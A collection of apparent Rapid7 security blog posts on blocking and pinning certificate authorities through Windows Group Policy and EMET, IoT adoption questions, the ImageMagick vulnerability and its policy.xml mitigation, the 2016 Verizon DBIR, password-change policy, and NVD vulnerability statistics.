
Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.

 

In the enterprise, with services exposed to the Internet and employees traveling and working from Wi-Fi and other insecure connections, this is also a very important issue, as a certificate from one of these less-than-trustworthy authorities could be used to intercept data (and credentials!).

 

Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.

 

Untrusting Certificate Authorities on Windows via GPO

 

Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.

 

While there are legitimate enterprise uses for these features, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time something like this has happened, and it will probably not be the last, so being ready to revoke trust in a certificate authority is an ability enterprises must have.

 

Filippo also posted a great tutorial on how to revoke the certificate on OS X, and he now links to Windows instructions; this article also covers pinning and goes into a bit more detail.

 

In this post, we will look at doing it on Windows, in an Active Directory environment.

 

Whitelist Versus Blacklist

 

Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective, since it keeps full control of the approved authorities. However, that is a whitelist approach: it requires additional management effort, since it involves replacing the certificates on all systems via GPO, and it risks breaking custom certificates installed for legitimate purposes. Treat it as a longer-term goal; a blacklist approach can be used right away.

 

In this case, start by downloading the certificate you want to block as a .crt file.

 

Create A Group Policy Object (GPO)

 

You could use an existing GPO or create a new one. The important thing to consider is that this will be a computer policy, which should be linked to the OUs where your workstations are located. As with any GPO change, it is highly recommended to first link and filter this policy to specific testing workstations, since a mistake could break SSL/TLS connectivity on those machines.

 

create_gpo.png

 

Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.

 

import.png

 

The first wizard screen has greyed-out options, as we are modifying a GPO. On the second screen, simply browse to the .crt file you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.

 

At this point, your GPO should look like this, and is ready to block this certificate from the Windows store on all machines where it is deployed.

 

GPO_output.png
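To confirm the policy took effect on a test workstation, you can check the machine's untrusted certificate store. The sketch below is a hedged, Windows-only illustration using Python's ssl.enum_certificates(); the documented store names are CA, ROOT and MY, but the name is passed straight to the Windows API, where "Disallowed" is the untrusted store. The thumbprint value is a placeholder you would substitute.

```python
# Hedged sketch (Windows-only): verify a blocked CA shows up in the
# machine's untrusted ("Disallowed") certificate store after the GPO applies.
import hashlib
import ssl

def disallowed_thumbprints():
    # enum_certificates() yields (cert_bytes, encoding_type, trust) tuples;
    # "x509_asn" entries are DER-encoded certificates
    for der, encoding, _trust in ssl.enum_certificates("Disallowed"):
        if encoding == "x509_asn":
            yield hashlib.sha1(der).hexdigest().upper()

# placeholder: the SHA-1 thumbprint of the CA you imported into the GPO
BLOCKED_THUMBPRINT = "0000000000000000000000000000000000000000"

print(BLOCKED_THUMBPRINT in set(disallowed_thumbprints()))
```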

 

Pinning Certificate Authorities Via GPO

 

Revoking known bad certificates is one thing, but a very reliable way to ensure bad certificates have no impact on corporate services is to pin them. Pinning essentially configures the client device to only accept known good values for pre-configured SSL/TLS communications.

 

Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.

 

This would allow us to configure systems to only expect, for example, that communications to the Rapid7 website should use GoDaddy certificates.

 

Rapid7dotcom.png
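Before writing a pinning rule, you need to know which CA actually issues the certificate for each service. Here is a minimal sketch of one way to check, using only Python's standard library (the hostname and port are examples):

```python
# Sketch: fetch the issuer of the certificate a site currently serves,
# so you know which CA to pin before configuring the rule.
import socket
import ssl

def issuer_of(host, port=443):
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # 'issuer' is a tuple of RDN tuples, e.g. ((('organizationName', ...),), ...)
    return dict(rdn[0] for rdn in cert["issuer"])

print(issuer_of("www.rapid7.com"))
```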

 

By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments, or even malicious attacks at the ISP level would require forging a certificate from that very specific authority, and you prevent the use of any other illegitimate yet trusted certificate.

 

Deploy EMET

 

Deployment of EMET has already been covered briefly in our Whiteboard Wednesdays, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates. While the other EMET mitigations are great for security, they are not covered in this post; we will focus only on certificate management.

 

Create A GPO For EMET

 

Again, a policy that applies to the appropriate computer objects must be created.

 

EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.

 

1. Copy the ADMX to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML to the <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Templates\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all URLs you want to protect, as well as the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the thumbprints (SHA-1) of the certificates to accept, or of their authorities. These rules can get very granular, include expiration dates and more; please read the examples provided by Microsoft if you would like to use such advanced rules. When starting out, the EMET GUI lets you see the types of rules that can be created more easily than editing these relatively unfriendly GPOs. (A quick way to compute a certificate's SHA-1 thumbprint is sketched after the screenshot below.)

8. In our example, I configure www.rapid7.com to only trust a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT. We configured this as a blocking rule that expires on Christmas 2020.

 

GPO.png
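If you need the SHA-1 thumbprint of a certificate you have on disk, it is simply the SHA-1 hash of the certificate's DER encoding. A minimal sketch using only Python's standard library (the file path is an example):

```python
# Sketch: compute the SHA-1 thumbprint of a .crt file, the value
# Windows and EMET display for a certificate.
import hashlib
import ssl
import sys

def thumbprint(path):
    data = open(path, "rb").read()
    if b"-----BEGIN CERTIFICATE-----" in data:
        # PEM-encoded: convert to DER first
        data = ssl.PEM_cert_to_DER_cert(data.decode("ascii"))
    return hashlib.sha1(data).hexdigest().upper()

if __name__ == "__main__":
    print(thumbprint(sys.argv[1]))  # e.g. python thumbprint.py ca.crt
```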

 

9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule being applied, denoted by the icon showing it is coming from a GPO.

 

fromGPO.png

10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate were at play in a man-in-the-middle attack.

 

certwarning.png

 

11. EMET logs an error to the Event Log, which you should absolutely detect and investigate.

 

event.png

 

12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, and SaaS providers. Additional protection for social network accounts can also be achieved this way.

 

Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules, to obtain better coverage. Again, this is the type of change that should be tested very well before being pushed to a significant number of workstations, but once done, you will have significantly reduced the chances of a man-in-the-middle attack, and improved the odds of detecting one.

 

Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week about "doing data science" at "internet scale," and about how you can get started doing security data science at home or in your organization. So, come on over to learn more about the unique challenges associated with analyzing "security data," the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away, and to find out what information lies hidden in this seemingly innocuous square:

 

all.png

This blog post was written by Bob Rudis, Chief Security Data Scientist, and Deral Heiland, Research Lead.

 

Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.

 

network-782707_960_720.png

 

As organizations continue to adopt IoT solutions into their environments, they are faced with a number of hard questions, and they may not always know what those questions are. In an attempt to help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.

 

  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? (i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)

 

What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. By default, these devices are on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.

 

Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look at the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed, without your knowledge, that may not have shown up on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.

 

Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient being able to deploy cameras or control environmental systems within a building or campus by using modern network protocols and spiffy apps. But, do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things,” quickly followed by “what value does this bring to our organization?” If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit, or consider deploying the technology in an isolated environment with strong access controls to limit or prevent connectivity to the organization's internal systems.

 

There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."

 

How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?

 

Most of these are standard questions on any new technology adoption within an organization. One issue with communications and IoT devices is that their makers tend to not have enterprise deployments in mind and the vast majority require direct internet connections, communicate without encryption and use new, low-power communication technologies to transmit data and control commands in clear text.

 

An advertised feature of many IoT devices is that they store your data in “the cloud.” Every question you currently ask about cloud deployments in your organization applies to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool.”

 

To get answers to these questions, don’t just trust the manufacturer. Hold your own Proof of Concept deployment in controlled environments and monitor all communications as you change settings. Your regulatory requirements or just internal policy requirements may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.

 

How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease-of-use is aimed at casual consumers, but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work.” This means many devices will have no password, or use only a simple static password, versus the more detailed or elaborate controls that you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. And if you think the access control is weak, consider that most have no concept of encryption on any communication channel. If the built-in controls do not conform with your standard requirements, consider isolating the “management” side within a separate network, if that’s possible.

 

IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.

 

What is the classification of the data?

Another key action to perform when deciding on implementing an IoT solution is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it within defined categories, we can better control how that data is gathered, transmitted, and stored within our environment. This will also help us make better informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policies and procedures are important to all businesses to assure that all data is being properly handled within the organization. If you do not have such a practice, it is highly recommended that one is developed and that IoT data is included in those policies and procedures.

 

The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.

 

Can we monitor and maintain these IoT devices?

Unlike the makers of servers, routers, switches and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. Often the only monitoring available is a notice when a device fails to phone home or fails to upload data within a preset time interval. Do not lightly assume you will be able to use SNMP or an SSH connection to gain management telemetry. Verify and test management options before committing to a solution.
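For devices that only "phone home," even a trivial last-seen watchdog is better than nothing. A toy sketch of the idea (the device names and intervals are hypothetical):

```python
# Toy sketch: alert when a device has not checked in within its
# expected interval -- the kind of monitoring many IoT devices allow.
import time

EXPECTED_INTERVAL = 3600  # seconds between expected check-ins

# hypothetical last check-in timestamps, keyed by device name
last_seen = {
    "hvac-01": time.time() - 7200,  # silent for two hours
    "cam-03": time.time() - 60,     # checked in a minute ago
}

now = time.time()
for device, seen in last_seen.items():
    if now - seen > EXPECTED_INTERVAL:
        print(f"ALERT: {device} silent for {int(now - seen)} seconds")
```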

 

Patch management is also a critical concern when dealing with IoT technology. In this case we have to consider the full ecosystem of the IoT solution deployed, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all segments are included in a comprehensive patch management solution can be difficult. Depending on the IoT technology deployed, automated vendor patching may not be available; if so, a self-managed solution will need to be implemented.

 

What are the failure modes?

Often overlooked when considering the deployment of any technology, but especially with IoT: what happens if the technology fails to operate correctly? Can the business proceed without these services, and what happens when a failure leads to a security breakdown or the loss of critical data? It is important that we identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancies.

 

If you have no current process in place to analyze failure modes, a great place to start is a cyber-oriented failure mode and effect analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify the outcomes of scenarios, and both help combat the urge to "make a gut call" when considering the possible negative outcomes of IoT deployments.

 

How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits within the parameters of your current threat models, and expand them only if you absolutely have to.

 

The Internet of Things holds much promise, profit, and progress, but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but we should do so in the safest and most secure ways possible. We hope these questions help you better assess the risk of the IoT you already have, and of the IoT you will be adopting.

 


[1] Security Framework for Control System Data Classification and Protection: http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/21-Security_Framework_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=http://dx.doi.org/10.1007/978-3-319-10506-2_21

[3] The OpenFAIR body of knowledge: http://www.opengroup.org/subjectareas/security/risk

ImageMagick Vulnerabilities and Exploits

 

On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs which coders and resources ImageMagick components may use.
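For reference, the mitigation circulating at the time of disclosure disables the coders abused by the known exploit paths via policy.xml. Treat the snippet below as a sketch and verify it against the project's forum post, since the exact policy your deployment needs may differ:

```xml
<policymap>
  <!-- disable the indirect-read coders abused by the known exploit paths -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
```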

 

Essentially, the ImageMagick vulnerabilities are a combination of a file-type confusion vulnerability (where the ImageMagick components do not correctly identify a file format) and a command injection vulnerability (where the filtering mechanisms guarding against shell escapes are insufficient).

 

How worried should I be?

 

The reason for the public disclosure in the first place is that the vulnerabilities were already being exploited by unknown actors, as reported by Ryan Huber. As he predicted, published exploits by security researchers targeting the affected components are emerging in short order, including a Metasploit module authored by William Vu and HD Moore.

 

As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.

 

What's next?

 

Website operators should immediately determine their use of ImageMagick components in image processing, and implement the referenced policy.xml mitigation while awaiting an updated package that fixes the identified vulnerabilities. ImageMagick parses hundreds of file formats, which is part of its usefulness, but restricting the accepted formats to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for those sites where it makes sense to do so.

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers has, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.

 

The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.

 

Bigger is…Better?

 

There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:

 

2016-verizon-data-breach-report-fig-1-1.png

We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:

 

2016-verizon-data-breach-report-fig-2-1.png

We can also take another, discrete view of this by industry:

 

2016-verizon-data-breach-report-fig-3-1.png

 

(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")

 

As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and benchmark your security program. Take your incident-to-breach ratio (you are using VERIS to record and track everything from anti-virus hits to full-on breaches, right?) and compare it to the corresponding industry/size.
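If you track your own incidents in VERIS or a ticketing system, the comparison itself is trivial. A tiny sketch with hypothetical counts:

```python
# Hypothetical tally: compare your own incident-to-breach ratio to the
# industry figures in DBIR Tables 1 & 2.
incidents = 412  # everything recorded this year (hypothetical count)
breaches = 9     # incidents with confirmed data disclosure (hypothetical)

print(f"breach ratio: {breaches / incidents:.1%}")  # prints "breach ratio: 2.2%"
```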

 

The Single Most Popular Valuable Chart In The World! (for defenders)

 

When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:

 

2016-verizon-data-breach-report-fig-4-1.png

We smoothed out the rough edges from the 2016 Verizon Data Breach Report figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap:

 

2016-verizon-data-breach-report-fig-5-1.png

 

Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"

 

So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:

 

2016-verizon-data-breach-report-fig-6-1.png

Some key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)

 

Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.

 

Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:

 

  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers

 

This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category:

 

"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."

 

So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.

 

Who has your back?

 

When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well:

 

2016-verizon-data-breach-report-fig-7-1.png

In the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.

 

Are you:

 

  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?

 

If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is a battle of economics).

 

Are You Feeling Vulnerable?

 

Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:

 

dbirfig13.png

We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?

 

  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a patching strategy with a holistic focus, rather than just reacting to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.

 

"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.

 

There and Back Again

 

This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.


(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)

 

Related Resources:

 

Watch my short take on this year's Verizon Data Breach Investigations Report.

 

DBIR video.png

Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

I'm often asked by friends and colleagues: Why do I have to change my password every 30 or 60 days? My response is always the same: Odds are good that it’s because that's the way that it's always been done. Or, these people might have a super strict IT manager who likes to show - on paper - that his or her environment is "locked down." Occasionally I will get feedback that auditors require such stringent settings. The funny thing is, there's never really a good business reason behind such short-term password changes.

 

In fact, if you dig in further, in many cases there are numerous other issues that are a much higher risk than passwords that are not changed often. I often see weak password requirements – i.e. complexity not being enforced or 6-character minimum lengths. I often see this combined with super weak endpoint security such as minimal Windows patching, no third-party software patching, no full disk encryption, and network monitoring/alerting that is reactive at best.

So, why is it that we go with the 30, 60, or 90-day password change requirements? I don't think it's malicious, but I do believe that people just aren't taking the time to think about what they're doing. In fact, that's sort of the essence of many security challenges that businesses face today. People just aren’t thinking about what they're actually doing. They're going through the motions with their “policies” and they have these fancy technologies deployed but, in reality, the implementation of everything stinks. At the end of the day, management assumes that all is well because of all of the money and effort being spent on these issues (including those pesky password changes) and yet they still get hit with breaches and no one can figure out why.

 

I think many seasoned IT and security professionals would agree with me that quick turnarounds on password changes are actually bad for security. We always joke about how users will write down their passwords on sticky notes – and it's true! But it goes deeper than the humor. There's a strong political factor at the root of much of the password nonsense. Users don't want to have to create and remember long passwords.

 

After all, odds are they’ve never been taught or guided to use passphrases, which are super simple to create and remember yet practically impossible to crack. Furthermore, management doesn't want to hear about it, so IT doesn't press the issue. Thus the ignorant cycle: if we can't make them use strong passphrases, we can at least require quick password changes. The madness continues and it’s bad for business.
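A back-of-the-envelope calculation shows why passphrases win: entropy grows faster with length than with character-set size. A quick illustrative sketch (the charset sizes are the usual rough estimates):

```python
# Rough illustration: a long, memorable passphrase out-scores a short
# "complex" password against brute force.
import math

def entropy_bits(charset_size, length):
    # each character adds log2(charset) bits against brute force
    return length * math.log2(charset_size)

print(f"8-char complex password (95 printable chars): {entropy_bits(95, 8):.0f} bits")
print(f"20-char lowercase passphrase with spaces (27): {entropy_bits(27, 20):.0f} bits")
```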

 

Anytime you create complexity, in this case by requiring users to continually change their passwords whether or not they’re suspected to have been compromised, you create more problems than you solve in most cases. There are always exceptions, and compensating controls such as intruder lockout, two-factor authentication, and proactive system monitoring can thwart most attacks on user accounts. It’s time to look past the nonsense and capitalize on opportunities such as this to get people on our side rather than continue ticking them off.

This is a guest post by Ismail Guneydas. Ismail Guneydas is a senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-crime investigations and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty member at Texas A&M. He holds an M.S. in computer science and an MBA.

 

2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them.  For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal.

 

Why the National Vulnerability Database (NVD)?  To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. Government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, impact metrics—amongst other data fields.

By poring through the NVD data from the last 5 years, we're looking to answer the following questions:

  • What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific?
  • What are the severities of vulnerabilities? Do we have more critical vulnerabilities or less?
  • What vendors create most vulnerable products?
  • What products are most vulnerable?
    • Which OS? Windows, OS X, a Linux distro?
    • Which mobile OS? iOS, Android, Windows?
    • Which web browser? Safari, Internet Explorer, Firefox?

 

Vulnerabilities Per Year

VulnerabilitiesPerYear.jpg

 

That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to 2014. However, if you look at the overall growth trend of the last 5 years, the 2015 number seems consistent with the overall growth rate. The abnormality was the 53% increase in 2014. If we compare 2015's numbers with 2013's, we see a 24% increase.

 

All in all though, this doesn't mean we didn't have a bad year, as we did in 2014 (and the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting: there were more critical vulnerabilities in 2015 than in 2014. In 2014 we had more vulnerabilities with CVSS scores of 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS scores of 7, 8, 9 and 10!

 

Vulnerability-Distro-By-CVSS-Score.jpg

As you see above, there were 3376 critical vulnerabilities in 2015, whereas there were only 2887 critical vulnerabilities in 2014. (That is a 17% increase.)

 

In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective—fewer false positives and negatives—up-to-date with recent vulnerabilities, and faster with shorter scan times.

 

Severity of Vulnerabilities

This chart shows the distribution of 2015 vulnerabilities by CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical.

CVSS-Score-.jpg

 

There are many vulnerabilities with CVSS scores of 9 and 10. Let's check the following graph, which gives a clearer picture:

 

Weighted-Average.jpg

This means 36% of the vulnerabilities were critical (CVSS >= 7). The average CVSS score is 6.8, which sits right at the critical boundary.
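If you want to reproduce this kind of tally yourself, the NVD publishes per-year data feeds. Here is a hedged sketch of the computation, assuming a feed downloaded in the newer NVD JSON 1.1 format (e.g. nvdcve-1.1-2015.json); the feeds available when this post was written were XML, so the field names below are tied to the JSON schema:

```python
# Sketch: count critical vulnerabilities (CVSS v2 >= 7) and the average
# score from a downloaded NVD JSON 1.1 feed.
import json
from collections import Counter

with open("nvdcve-1.1-2015.json") as f:
    items = json.load(f)["CVE_Items"]

scores = [
    item["impact"]["baseMetricV2"]["cvssV2"]["baseScore"]
    for item in items
    if "baseMetricV2" in item.get("impact", {})
]

print("total scored vulnerabilities:", len(scores))
print("critical (CVSS >= 7):", sum(s >= 7 for s in scores))
print("average CVSS: %.1f" % (sum(scores) / len(scores)))
print(Counter(int(s) for s in scores))  # distribution by integer bucket
```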

 

The severity of vulns is increasing, but this isn’t to say it’s all bad. In fact, it really exposes a crucial point: you have to be deploying a vulnerability management program that separates the wheat from the chaff. An effective vulnerability management program will help you find, and then remediate, the vulnerabilities in your environment.

 

Vulnerability Numbers Per Vendor

Let's analyze the National Vulnerability Database numbers by checking vendors' vulnerabilities. The shifting tide of vulnerabilities doesn’t stop for any company, including Apple. The fact is there are always vulnerabilities; the key is detecting them before they are exploited.

 

Apple had the most vulnerabilities in 2015. Of course, with many iOS and OS X vulnerabilities out there in general, it's no surprise this number went up.

 

Here is the full list:

mostvulnerablevendors.jpg

 

